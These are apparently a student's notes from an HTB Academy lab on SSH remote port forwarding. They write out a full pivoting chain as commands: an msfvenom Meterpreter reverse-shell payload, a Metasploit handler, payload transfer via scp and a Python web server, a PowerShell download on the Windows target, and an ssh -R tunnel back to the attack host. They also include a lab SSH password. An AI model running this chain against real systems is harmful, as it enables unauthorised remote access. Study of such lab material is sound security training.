Skip to content

SSH remote port forwarding

Scenario

  • We CAN pivot into the Windows A host via the Ubuntu Server.
    • We CAN RDP into the Windows A host
  • But we canNot a reverse shell from Windows A into Attack Host

tmux env setup 

tmux setenv EXTERNAL_IP_OF_PIVOT_HOST 10.129.196.1
tmux setenv INTERNAL_IP_OF_PIVOT_HOST 172.16.5.129
tmux setenv LOCAL_IP 10.10.14.118
tmux setenv WIN_IP_NET_2 172.16.5.19


ssh ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST
|<- HTB_@cademy_stdnt!

Setup part 1

Creating a Windows Payload with msfvenom 

msfvenom -p windows/x64/meterpreter/reverse_https lhost=$INTERNAL_IP_OF_PIVOT_HOST -f exe -o shell.exe LPORT=8080

Configuring & Starting the multi/handler 

msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost $LOCAL_IP; set lport 8000; exploit"

Setup part 2

Transferring Payload to Pivot Host (to Victim Server - Ubuntu) 

scp shell.exe ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST:~/

Starting Python3 Webserver on Pivot Host (on Victim Server - Ubuntu) 

python3 -m http.server 8123

Downloading Payload from Windows Target 

Invoke-WebRequest -Uri "http:/<INTERNAL_IP_OF_PIVOT_HOST>:8123/shell.exe" -OutFile "C:\shell.exe"

Setup part 3

on Attack Host 

ssh -R $INTERNAL_IP_OF_PIVOT_HOST:8080:0.0.0.0:8000 ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST -vN

on Victim Server (Windows A) 

.\shell.exe